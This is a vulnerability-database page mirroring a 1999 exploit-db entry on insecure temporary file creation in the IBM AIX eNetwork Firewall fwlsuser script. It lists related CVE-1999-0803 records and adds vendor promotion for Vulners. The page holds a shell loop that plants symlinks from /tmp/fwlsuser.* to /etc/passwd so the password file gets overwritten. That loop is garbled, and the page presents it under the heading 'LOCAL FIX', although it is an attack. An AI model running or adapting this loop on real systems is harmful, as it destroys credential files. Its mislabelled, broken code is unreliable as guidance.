Lucene search
+L

IBM AIX eNetwork Firewall 3.2/3.3 - Insecure Temporary File Creation

🗓️ 25 May 1999 00:00:00Reported by Paul CammidgeType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 24 Views

IBM AIX eNetwork Firewall insecurely creates temporary files, risking unauthorized file overwrites.

Related
Code
ReporterTitlePublishedViews
Family
cve
CVE
CVE-1999-0803
25 Apr 200004:00
cve
cvelist
Cvelist
CVE-1999-0803
25 Apr 200004:00
cvelist
euvd
EUVD
EUVD-1999-0784
7 Oct 202500:30
euvd
nvd
NVD
CVE-1999-0803
25 May 199904:00
nvd
redhatcve
RedhatCVE
CVE-1999-0803
21 May 202518:12
redhatcve
soure: https://www.securityfocus.com/bid/287/info

IBM's eNetwork Firewall for AIX contains a number of vulnerability in scripts which manipulate files insecurely. When fwlsuser script is run it creates a temporary file called /tmp/fwlsuser.PID ( where PID is the process ID of the command being run ). If this file is created previously and is a link to any other file the output generated by the fwlsuser script will overwrite this linked file.

x = 5000
while true

LOCAL FIX AS REPORTED BY ORIGINATOR:
ln -s /etc/passwd /tmp/fwlsuser.$x
# rm /tmp/fwlsuser.$x
let x=$x+1
echo $x
done
exit

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

16 Jun 2012 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 22.1
EPSS0.00537
24